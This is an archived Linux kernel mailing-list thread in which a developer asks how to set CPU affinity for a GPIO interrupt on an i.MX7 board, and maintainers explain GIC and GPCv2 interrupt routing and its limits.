> Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-11 14:37           ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-11 14:37 UTC (permalink / raw)
  To: kernelnewbies

On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
>> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> > Hi,
>> >
>> > I need one help.
>> > I am using i.MX7 Sabre board with kernel version 4.1.15
>> >
>> > Let's say I am interested in GPIO number: 21
>> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
>> > tried the below steps:
>> > root at 10:~# echo 21 > /sys/class/gpio/export
>> > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> > root at 10:~# cat /proc/interrupts | grep 21
>> >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> > root at 10:~# cat /sys/class/gpio/gpio21/direction
>> > in
>> > root at 10:~# cat /proc/irq/47/smp_affinity
>> > 3
>> > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
>> > -bash: echo: write error: Input/output error
>> >
>> > But I get input/output error.
>> > When I debug further, found that irq_can_set_affinity is returning 0:
>> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> > [    0.000000] write_irq_affinity: FAIL
>> >
>> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
>> > This change is working, but the smp_affinity setting for the new IRQ
>> > is not working.
>> >
>> > When I try to set smp_affinity for mmc0, then it works.
>> > # cat /proc/interrupts | grep mmc
>> > 295:         55          0     GPCV2  22 Edge      mmc0
>> > 296:          0          0     GPCV2  23 Edge      mmc1
>> > 297:         52          0     GPCV2  24 Edge      mmc2
>> >
>> > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
>> > root at 10:~#
>> >
>> >
>> > So, I wanted to know what are the conditions for which setting
>> > smp_affinity for an IRQ will work ?
>> >
>> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
>> > Whether, irq_set_affinity_hint() will work in this case ?
>>
>> IRQ affinity is only supported where interrupts are _directly_ wired to
>> the GIC.  It's the GIC which does the interrupt steering to the CPU
>> cores.
>>
>> Interrupts on downstream interrupt controllers (such as GPCV2) have no
>> ability to be directed independently to other CPUs - the only possible
>> way to change the mapping is to move _all_ interrupts on that controller,
>> and any downstream chained interrupts at GIC level.
>>
>> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
>> for the interrupt controller itself to change the affinity of the input
>> interrupt.
>
> The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
> of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
> handled by forwarding the request to the GIC by
> irq_chip_set_affinity_parent().
>
> As this is handled correctly in the upstream kernel since the first
> commit introducing support for the GPCv2, it seems the issue is only
> present in some downstream kernel.
>

OK. Thanks so much for your reply.

I saw some of the drivers using irq_set_affinity_hint() to force the
IRQ affinity to a particular CPU.
This is the sample:
{
cpumask_clear(mask);
cpumask_set_cpu(cpu, mask);
irq_set_affinity_hint(irq, mask);
}

Whether this logic will work for a particular GPIO pin ?


> Regards,
> Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2018-05-11 14:37           ` Pintu Kumar
  (?)
@ 2018-05-14 12:12             ` Pintu Kumar
  -1 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-14 12:12 UTC (permalink / raw)
  To: Lucas Stach
  Cc: Russell King - ARM Linux, open list, linux-arm-kernel, kernelnewbies

Hi,

Is there any work around possible to set IRQ affinity for some GPIO interrupt ?
How to avoid CPU0 to receive the current GPIO interrupt ?
How do we assign GPIO interrupts to any CPU other than CPU0 ?
Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
that GPIO interrupt can be served by another CPU ?

Need your inputs to decide whether it is still possible to set
affinity for GPIO interrupt, or its impossible ?


Thanks,
Pintu



On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
> On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
>> Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
>>> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>>> > Hi,
>>> >
>>> > I need one help.
>>> > I am using i.MX7 Sabre board with kernel version 4.1.15
>>> >
>>> > Let's say I am interested in GPIO number: 21
>>> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
>>> > tried the below steps:
>>> > root@10:~# echo 21 > /sys/class/gpio/export
>>> > root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>>> > root@10:~# cat /proc/interrupts | grep 21
>>> >   47: 0 0 gpio-mxc 21 Edge gpiolib
>>> > root@10:~# cat /sys/class/gpio/gpio21/direction
>>> > in
>>> > root@10:~# cat /proc/irq/47/smp_affinity
>>> > 3
>>> > root@10:~# echo 2 > /proc/irq/47/smp_affinity
>>> > -bash: echo: write error: Input/output error
>>> >
>>> > But I get input/output error.
>>> > When I debug further, found that irq_can_set_affinity is returning 0:
>>> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>>> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>>> > [    0.000000] write_irq_affinity: FAIL
>>> >
>>> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
>>> > This change is working, but the smp_affinity setting for the new IRQ
>>> > is not working.
>>> >
>>> > When I try to set smp_affinity for mmc0, then it works.
>>> > # cat /proc/interrupts | grep mmc
>>> > 295:         55          0     GPCV2  22 Edge      mmc0
>>> > 296:          0          0     GPCV2  23 Edge      mmc1
>>> > 297:         52          0     GPCV2  24 Edge      mmc2
>>> >
>>> > root@10:~# echo 2 > /proc/irq/295/smp_affinity
>>> > root@10:~#
>>> >
>>> >
>>> > So, I wanted to know what are the conditions for which setting
>>> > smp_affinity for an IRQ will work ?
>>> >
>>> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
>>> > Whether, irq_set_affinity_hint() will work in this case ?
>>>
>>> IRQ affinity is only supported where interrupts are _directly_ wired to
>>> the GIC.  It's the GIC which does the interrupt steering to the CPU
>>> cores.
>>>
>>> Interrupts on downstream interrupt controllers (such as GPCV2) have no
>>> ability to be directed independently to other CPUs - the only possible
>>> way to change the mapping is to move _all_ interrupts on that controller,
>>> and any downstream chained interrupts at GIC level.
>>>
>>> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
>>> for the interrupt controller itself to change the affinity of the input
>>> interrupt.
>>
>> The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
>> of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
>> handled by forwarding the request to the GIC by
>> irq_chip_set_affinity_parent().
>>
>> As this is handled correctly in the upstream kernel since the first
>> commit introducing support for the GPCv2, it seems the issue is only
>> present in some downstream kernel.
>>
>
> OK. Thanks so much for your reply.
>
> I saw some of the drivers using irq_set_affinity_hint() to force the
> IRQ affinity to a particular CPU.
> This is the sample:
> {
> cpumask_clear(mask);
> cpumask_set_cpu(cpu, mask);
> irq_set_affinity_hint(irq, mask);
> }
>
> Whether this logic will work for a particular GPIO pin ?
>
>
>> Regards,
>> Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-14 12:12             ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-14 12:12 UTC (permalink / raw)
  To: linux-arm-kernel

Hi,

Is there any work around possible to set IRQ affinity for some GPIO interrupt ?
How to avoid CPU0 to receive the current GPIO interrupt ?
How do we assign GPIO interrupts to any CPU other than CPU0 ?
Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
that GPIO interrupt can be served by another CPU ?

Need your inputs to decide whether it is still possible to set
affinity for GPIO interrupt, or its impossible ?


Thanks,
Pintu



On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
> On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
>> Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
>>> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>>> > Hi,
>>> >
>>> > I need one help.
>>> > I am using i.MX7 Sabre board with kernel version 4.1.15
>>> >
>>> > Let's say I am interested in GPIO number: 21
>>> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
>>> > tried the below steps:
>>> > root at 10:~# echo 21 > /sys/class/gpio/export
>>> > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>>> > root at 10:~# cat /proc/interrupts | grep 21
>>> >   47: 0 0 gpio-mxc 21 Edge gpiolib
>>> > root at 10:~# cat /sys/class/gpio/gpio21/direction
>>> > in
>>> > root at 10:~# cat /proc/irq/47/smp_affinity
>>> > 3
>>> > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
>>> > -bash: echo: write error: Input/output error
>>> >
>>> > But I get input/output error.
>>> > When I debug further, found that irq_can_set_affinity is returning 0:
>>> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>>> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>>> > [    0.000000] write_irq_affinity: FAIL
>>> >
>>> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
>>> > This change is working, but the smp_affinity setting for the new IRQ
>>> > is not working.
>>> >
>>> > When I try to set smp_affinity for mmc0, then it works.
>>> > # cat /proc/interrupts | grep mmc
>>> > 295:         55          0     GPCV2  22 Edge      mmc0
>>> > 296:          0          0     GPCV2  23 Edge      mmc1
>>> > 297:         52          0     GPCV2  24 Edge      mmc2
>>> >
>>> > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
>>> > root at 10:~#
>>> >
>>> >
>>> > So, I wanted to know what are the conditions for which setting
>>> > smp_affinity for an IRQ will work ?
>>> >
>>> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
>>> > Whether, irq_set_affinity_hint() will work in this case ?
>>>
>>> IRQ affinity is only supported where interrupts are _directly_ wired to
>>> the GIC.  It's the GIC which does the interrupt steering to the CPU
>>> cores.
>>>
>>> Interrupts on downstream interrupt controllers (such as GPCV2) have no
>>> ability to be directed independently to other CPUs - the only possible
>>> way to change the mapping is to move _all_ interrupts on that controller,
>>> and any downstream chained interrupts at GIC level.
>>>
>>> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
>>> for the interrupt controller itself to change the affinity of the input
>>> interrupt.
>>
>> The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
>> of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
>> handled by forwarding the request to the GIC by
>> irq_chip_set_affinity_parent().
>>
>> As this is handled correctly in the upstream kernel since the first
>> commit introducing support for the GPCv2, it seems the issue is only
>> present in some downstream kernel.
>>
>
> OK. Thanks so much for your reply.
>
> I saw some of the drivers using irq_set_affinity_hint() to force the
> IRQ affinity to a particular CPU.
> This is the sample:
> {
> cpumask_clear(mask);
> cpumask_set_cpu(cpu, mask);
> irq_set_affinity_hint(irq, mask);
> }
>
> Whether this logic will work for a particular GPIO pin ?
>
>
>> Regards,
>> Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-14 12:12             ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-14 12:12 UTC (permalink / raw)
  To: kernelnewbies

Hi,

Is there any work around possible to set IRQ affinity for some GPIO interrupt ?
How to avoid CPU0 to receive the current GPIO interrupt ?
How do we assign GPIO interrupts to any CPU other than CPU0 ?
Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
that GPIO interrupt can be served by another CPU ?

Need your inputs to decide whether it is still possible to set
affinity for GPIO interrupt, or its impossible ?


Thanks,
Pintu



On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com> wrote:
> On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
>> Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
>>> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>>> > Hi,
>>> >
>>> > I need one help.
>>> > I am using i.MX7 Sabre board with kernel version 4.1.15
>>> >
>>> > Let's say I am interested in GPIO number: 21
>>> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
>>> > tried the below steps:
>>> > root at 10:~# echo 21 > /sys/class/gpio/export
>>> > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>>> > root at 10:~# cat /proc/interrupts | grep 21
>>> >   47: 0 0 gpio-mxc 21 Edge gpiolib
>>> > root at 10:~# cat /sys/class/gpio/gpio21/direction
>>> > in
>>> > root at 10:~# cat /proc/irq/47/smp_affinity
>>> > 3
>>> > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
>>> > -bash: echo: write error: Input/output error
>>> >
>>> > But I get input/output error.
>>> > When I debug further, found that irq_can_set_affinity is returning 0:
>>> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>>> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>>> > [    0.000000] write_irq_affinity: FAIL
>>> >
>>> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
>>> > This change is working, but the smp_affinity setting for the new IRQ
>>> > is not working.
>>> >
>>> > When I try to set smp_affinity for mmc0, then it works.
>>> > # cat /proc/interrupts | grep mmc
>>> > 295:         55          0     GPCV2  22 Edge      mmc0
>>> > 296:          0          0     GPCV2  23 Edge      mmc1
>>> > 297:         52          0     GPCV2  24 Edge      mmc2
>>> >
>>> > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
>>> > root at 10:~#
>>> >
>>> >
>>> > So, I wanted to know what are the conditions for which setting
>>> > smp_affinity for an IRQ will work ?
>>> >
>>> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
>>> > Whether, irq_set_affinity_hint() will work in this case ?
>>>
>>> IRQ affinity is only supported where interrupts are _directly_ wired to
>>> the GIC.  It's the GIC which does the interrupt steering to the CPU
>>> cores.
>>>
>>> Interrupts on downstream interrupt controllers (such as GPCV2) have no
>>> ability to be directed independently to other CPUs - the only possible
>>> way to change the mapping is to move _all_ interrupts on that controller,
>>> and any downstream chained interrupts at GIC level.
>>>
>>> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
>>> for the interrupt controller itself to change the affinity of the input
>>> interrupt.
>>
>> The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
>> of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
>> handled by forwarding the request to the GIC by
>> irq_chip_set_affinity_parent().
>>
>> As this is handled correctly in the upstream kernel since the first
>> commit introducing support for the GPCv2, it seems the issue is only
>> present in some downstream kernel.
>>
>
> OK. Thanks so much for your reply.
>
> I saw some of the drivers using irq_set_affinity_hint() to force the
> IRQ affinity to a particular CPU.
> This is the sample:
> {
> cpumask_clear(mask);
> cpumask_set_cpu(cpu, mask);
> irq_set_affinity_hint(irq, mask);
> }
>
> Whether this logic will work for a particular GPIO pin ?
>
>
>> Regards,
>> Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2018-05-14 12:12             ` Pintu Kumar
  (?)
@ 2018-05-14 13:11               ` Lucas Stach
  -1 siblings, 0 replies; 183+ messages in thread
From: Lucas Stach @ 2018-05-14 13:11 UTC (permalink / raw)
  To: Pintu Kumar
  Cc: Russell King - ARM Linux, open list, linux-arm-kernel, kernelnewbies

Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
> Hi,
> 
> Is there any work around possible to set IRQ affinity for some GPIO
> interrupt ?
> How to avoid CPU0 to receive the current GPIO interrupt ?
> How do we assign GPIO interrupts to any CPU other than CPU0 ?
> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
> that GPIO interrupt can be served by another CPU ?
> 
> Need your inputs to decide whether it is still possible to set
> affinity for GPIO interrupt, or its impossible ?

This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
line per GPIO bank, so it is not possible to change affinity of a
single GPIO interrupt to another CPU. Best we could do is change the
affinity of the whole bank, but given the limited usefulness of
something like that, nobody bothered to implement such a thing.

Regards,
Lucas

> 
> 
> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
> wrote:
> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
> > e> wrote:
> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
> > > ARM Linux:
> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> > > > > Hi,
> > > > > 
> > > > > I need one help.
> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
> > > > > 
> > > > > Let's say I am interested in GPIO number: 21
> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
> > > > > so I
> > > > > tried the below steps:
> > > > > root@10:~# echo 21 > /sys/class/gpio/export
> > > > > root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> > > > > root@10:~# cat /proc/interrupts | grep 21
> > > > >   47: 0 0 gpio-mxc 21 Edge gpiolib
> > > > > root@10:~# cat /sys/class/gpio/gpio21/direction
> > > > > in
> > > > > root@10:~# cat /proc/irq/47/smp_affinity
> > > > > 3
> > > > > root@10:~# echo 2 > /proc/irq/47/smp_affinity
> > > > > -bash: echo: write error: Input/output error
> > > > > 
> > > > > But I get input/output error.
> > > > > When I debug further, found that irq_can_set_affinity is
> > > > > returning 0:
> > > > > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> > > > > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> > > > > [    0.000000] write_irq_affinity: FAIL
> > > > > 
> > > > > I also tried first setting /proc/irq/default_smp_affinity to
> > > > > 2 (from 3).
> > > > > This change is working, but the smp_affinity setting for the
> > > > > new IRQ
> > > > > is not working.
> > > > > 
> > > > > When I try to set smp_affinity for mmc0, then it works.
> > > > > # cat /proc/interrupts | grep mmc
> > > > > 295:         55          0     GPCV2  22 Edge      mmc0
> > > > > 296:          0          0     GPCV2  23 Edge      mmc1
> > > > > 297:         52          0     GPCV2  24 Edge      mmc2
> > > > > 
> > > > > root@10:~# echo 2 > /proc/irq/295/smp_affinity
> > > > > root@10:~#
> > > > > 
> > > > > 
> > > > > So, I wanted to know what are the conditions for which
> > > > > setting
> > > > > smp_affinity for an IRQ will work ?
> > > > > 
> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
> > > > > IRQ ?
> > > > > Whether, irq_set_affinity_hint() will work in this case ?
> > > > 
> > > > IRQ affinity is only supported where interrupts are _directly_
> > > > wired to
> > > > the GIC.  It's the GIC which does the interrupt steering to the
> > > > CPU
> > > > cores.
> > > > 
> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
> > > > have no
> > > > ability to be directed independently to other CPUs - the only
> > > > possible
> > > > way to change the mapping is to move _all_ interrupts on that
> > > > controller,
> > > > and any downstream chained interrupts at GIC level.
> > > > 
> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
> > > > is no way
> > > > for the interrupt controller itself to change the affinity of
> > > > the input
> > > > interrupt.
> > > 
> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
> > > mapping
> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
> > > thus be
> > > handled by forwarding the request to the GIC by
> > > irq_chip_set_affinity_parent().
> > > 
> > > As this is handled correctly in the upstream kernel since the
> > > first
> > > commit introducing support for the GPCv2, it seems the issue is
> > > only
> > > present in some downstream kernel.
> > > 
> > 
> > OK. Thanks so much for your reply.
> > 
> > I saw some of the drivers using irq_set_affinity_hint() to force
> > the
> > IRQ affinity to a particular CPU.
> > This is the sample:
> > {
> > cpumask_clear(mask);
> > cpumask_set_cpu(cpu, mask);
> > irq_set_affinity_hint(irq, mask);
> > }
> > 
> > Whether this logic will work for a particular GPIO pin ?
> > 
> > 
> > > Regards,
> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-14 13:11               ` Lucas Stach
  0 siblings, 0 replies; 183+ messages in thread
From: Lucas Stach @ 2018-05-14 13:11 UTC (permalink / raw)
  To: linux-arm-kernel

Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
> Hi,
> 
> Is there any work around possible to set IRQ affinity for some GPIO
> interrupt ?
> How to avoid CPU0 to receive the current GPIO interrupt ?
> How do we assign GPIO interrupts to any CPU other than CPU0 ?
> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
> that GPIO interrupt can be served by another CPU ?
> 
> Need your inputs to decide whether it is still possible to set
> affinity for GPIO interrupt, or its impossible ?

This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
line per GPIO bank, so it is not possible to change affinity of a
single GPIO interrupt to another CPU. Best we could do is change the
affinity of the whole bank, but given the limited usefulness of
something like that, nobody bothered to implement such a thing.

Regards,
Lucas

> 
> 
> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
> wrote:
> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
> > e> wrote:
> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
> > > ARM Linux:
> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> > > > > Hi,
> > > > > 
> > > > > I need one help.
> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
> > > > > 
> > > > > Let's say I am interested in GPIO number: 21
> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
> > > > > so I
> > > > > tried the below steps:
> > > > > root at 10:~# echo 21 > /sys/class/gpio/export
> > > > > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> > > > > root at 10:~# cat /proc/interrupts | grep 21
> > > > > ? 47: 0 0 gpio-mxc 21 Edge gpiolib
> > > > > root at 10:~# cat /sys/class/gpio/gpio21/direction
> > > > > in
> > > > > root at 10:~# cat /proc/irq/47/smp_affinity
> > > > > 3
> > > > > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
> > > > > -bash: echo: write error: Input/output error
> > > > > 
> > > > > But I get input/output error.
> > > > > When I debug further, found that irq_can_set_affinity is
> > > > > returning 0:
> > > > > [????0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> > > > > irq_data.chip: a81b7e48, irq_set_affinity:???(null)
> > > > > [????0.000000] write_irq_affinity: FAIL
> > > > > 
> > > > > I also tried first setting /proc/irq/default_smp_affinity to
> > > > > 2 (from 3).
> > > > > This change is working, but the smp_affinity setting for the
> > > > > new IRQ
> > > > > is not working.
> > > > > 
> > > > > When I try to set smp_affinity for mmc0, then it works.
> > > > > # cat /proc/interrupts | grep mmc
> > > > > 295:?????????55??????????0?????GPCV2??22 Edge??????mmc0
> > > > > 296:??????????0??????????0?????GPCV2??23 Edge??????mmc1
> > > > > 297:?????????52??????????0?????GPCV2??24 Edge??????mmc2
> > > > > 
> > > > > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
> > > > > root at 10:~#
> > > > > 
> > > > > 
> > > > > So, I wanted to know what are the conditions for which
> > > > > setting
> > > > > smp_affinity for an IRQ will work ?
> > > > > 
> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
> > > > > IRQ ?
> > > > > Whether, irq_set_affinity_hint() will work in this case ?
> > > > 
> > > > IRQ affinity is only supported where interrupts are _directly_
> > > > wired to
> > > > the GIC.??It's the GIC which does the interrupt steering to the
> > > > CPU
> > > > cores.
> > > > 
> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
> > > > have no
> > > > ability to be directed independently to other CPUs - the only
> > > > possible
> > > > way to change the mapping is to move _all_ interrupts on that
> > > > controller,
> > > > and any downstream chained interrupts at GIC level.
> > > > 
> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
> > > > is no way
> > > > for the interrupt controller itself to change the affinity of
> > > > the input
> > > > interrupt.
> > > 
> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
> > > mapping
> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
> > > thus be
> > > handled by forwarding the request to the GIC by
> > > irq_chip_set_affinity_parent().
> > > 
> > > As this is handled correctly in the upstream kernel since the
> > > first
> > > commit introducing support for the GPCv2, it seems the issue is
> > > only
> > > present in some downstream kernel.
> > > 
> > 
> > OK. Thanks so much for your reply.
> > 
> > I saw some of the drivers using irq_set_affinity_hint() to force
> > the
> > IRQ affinity to a particular CPU.
> > This is the sample:
> > {
> > cpumask_clear(mask);
> > cpumask_set_cpu(cpu, mask);
> > irq_set_affinity_hint(irq, mask);
> > }
> > 
> > Whether this logic will work for a particular GPIO pin ?
> > 
> > 
> > > Regards,
> > > Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-14 13:11               ` Lucas Stach
  0 siblings, 0 replies; 183+ messages in thread
From: Lucas Stach @ 2018-05-14 13:11 UTC (permalink / raw)
  To: kernelnewbies

Am Montag, den 14.05.2018, 17:42 +0530 schrieb Pintu Kumar:
> Hi,
> 
> Is there any work around possible to set IRQ affinity for some GPIO
> interrupt ?
> How to avoid CPU0 to receive the current GPIO interrupt ?
> How do we assign GPIO interrupts to any CPU other than CPU0 ?
> Is it possible to isolate CPU0 for a sometime, from my GPIO driver so
> that GPIO interrupt can be served by another CPU ?
> 
> Need your inputs to decide whether it is still possible to set
> affinity for GPIO interrupt, or its impossible ?

This is not possible. The GPIO IRQs are aggregated into one GPC/GIC IRQ
line per GPIO bank, so it is not possible to change affinity of a
single GPIO interrupt to another CPU. Best we could do is change the
affinity of the whole bank, but given the limited usefulness of
something like that, nobody bothered to implement such a thing.

Regards,
Lucas

> 
> 
> On Fri, May 11, 2018 at 8:07 PM, Pintu Kumar <pintu.ping@gmail.com>
> wrote:
> > On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.d
> > e> wrote:
> > > Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King -
> > > ARM Linux:
> > > > On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> > > > > Hi,
> > > > > 
> > > > > I need one help.
> > > > > I am using i.MX7 Sabre board with kernel version 4.1.15
> > > > > 
> > > > > Let's say I am interested in GPIO number: 21
> > > > > I wanted to set CPU affinity for particular GPIO->IRQ number,
> > > > > so I
> > > > > tried the below steps:
> > > > > root at 10:~# echo 21 > /sys/class/gpio/export
> > > > > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> > > > > root at 10:~# cat /proc/interrupts | grep 21
> > > > > ? 47: 0 0 gpio-mxc 21 Edge gpiolib
> > > > > root at 10:~# cat /sys/class/gpio/gpio21/direction
> > > > > in
> > > > > root at 10:~# cat /proc/irq/47/smp_affinity
> > > > > 3
> > > > > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
> > > > > -bash: echo: write error: Input/output error
> > > > > 
> > > > > But I get input/output error.
> > > > > When I debug further, found that irq_can_set_affinity is
> > > > > returning 0:
> > > > > [????0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> > > > > irq_data.chip: a81b7e48, irq_set_affinity:???(null)
> > > > > [????0.000000] write_irq_affinity: FAIL
> > > > > 
> > > > > I also tried first setting /proc/irq/default_smp_affinity to
> > > > > 2 (from 3).
> > > > > This change is working, but the smp_affinity setting for the
> > > > > new IRQ
> > > > > is not working.
> > > > > 
> > > > > When I try to set smp_affinity for mmc0, then it works.
> > > > > # cat /proc/interrupts | grep mmc
> > > > > 295:?????????55??????????0?????GPCV2??22 Edge??????mmc0
> > > > > 296:??????????0??????????0?????GPCV2??23 Edge??????mmc1
> > > > > 297:?????????52??????????0?????GPCV2??24 Edge??????mmc2
> > > > > 
> > > > > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
> > > > > root at 10:~#
> > > > > 
> > > > > 
> > > > > So, I wanted to know what are the conditions for which
> > > > > setting
> > > > > smp_affinity for an IRQ will work ?
> > > > > 
> > > > > Is there any way by which I can set CPU affinity to a GPIO ->
> > > > > IRQ ?
> > > > > Whether, irq_set_affinity_hint() will work in this case ?
> > > > 
> > > > IRQ affinity is only supported where interrupts are _directly_
> > > > wired to
> > > > the GIC.??It's the GIC which does the interrupt steering to the
> > > > CPU
> > > > cores.
> > > > 
> > > > Interrupts on downstream interrupt controllers (such as GPCV2)
> > > > have no
> > > > ability to be directed independently to other CPUs - the only
> > > > possible
> > > > way to change the mapping is to move _all_ interrupts on that
> > > > controller,
> > > > and any downstream chained interrupts at GIC level.
> > > > 
> > > > Hence why Interrupt 295 has no irq_set_affinity function: there
> > > > is no way
> > > > for the interrupt controller itself to change the affinity of
> > > > the input
> > > > interrupt.
> > > 
> > > The GPCv2 though is a secondary IRQ controller which has a 1:1
> > > mapping
> > > of its input IRQs to the upstream GIC IRQ lines. Affinity can
> > > thus be
> > > handled by forwarding the request to the GIC by
> > > irq_chip_set_affinity_parent().
> > > 
> > > As this is handled correctly in the upstream kernel since the
> > > first
> > > commit introducing support for the GPCv2, it seems the issue is
> > > only
> > > present in some downstream kernel.
> > > 
> > 
> > OK. Thanks so much for your reply.
> > 
> > I saw some of the drivers using irq_set_affinity_hint() to force
> > the
> > IRQ affinity to a particular CPU.
> > This is the sample:
> > {
> > cpumask_clear(mask);
> > cpumask_set_cpu(cpu, mask);
> > irq_set_affinity_hint(irq, mask);
> > }
> > 
> > Whether this logic will work for a particular GPIO pin ?
